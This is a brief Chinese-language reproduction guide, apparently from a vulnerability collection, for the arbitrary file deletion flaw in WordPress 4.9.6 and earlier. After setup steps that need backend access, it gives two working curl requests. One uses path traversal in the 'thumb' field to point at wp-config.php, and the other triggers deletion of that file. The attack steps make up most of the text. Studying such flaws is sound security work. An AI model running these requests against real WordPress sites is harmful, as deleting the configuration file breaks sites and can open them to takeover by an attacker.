Wordpress = 4.9.6 任意文件删除漏洞.md
1.49 KB / 2021-07-15 20:10:36
Wordpress \<= 4.9.6 任意文件删除漏洞
====================================
一、漏洞简介
------------
利用条件L:需要进入后台
二、漏洞影响
------------
三、复现过程
------------
### 添加新媒体
访问[http://0-sec.org/wp-admin/upload.php,然后上传图片。](http://0-sec.org/wp-admin/upload.php,然后上传图片。)
![](./resource/Wordpress<=4.9.6任意文件删除漏洞/media/rId26.png)
### 将\$ meta \[\'thumb\'\]设置为我们要删除的文件
#### 单击我们在中上传的图像Step 2,并记住图像的ID。
![](./resource/Wordpress<=4.9.6任意文件删除漏洞/media/rId29.png)
#### 访问[http://0-sec.org/wp-admin/post.php?post=4&action=edit.\_wpnonce在页面源中查找](http://0-sec.org/wp-admin/post.php?post=4&action=edit._wpnonce在页面源中查找)
![](./resource/Wordpress<=4.9.6任意文件删除漏洞/media/rId32.png)
#### 发送有效载荷:
curl -v 'http://0-sec.org/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=editattachment&_wpnonce=***&thumb=../../../../wp-config.php'
![](./resource/Wordpress<=4.9.6任意文件删除漏洞/media/rId34.png)
### 发动攻击
#### 在页面源码中查找 \_wpnonce
![](./resource/Wordpress<=4.9.6任意文件删除漏洞/media/rId37.png)
#### 发送有效载荷
curl -v 'http://9c9b.vsplate.me/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=delete&_wpnonce=***'
![](./resource/Wordpress<=4.9.6任意文件删除漏洞/media/rId39.png)
#### 刷新页面
image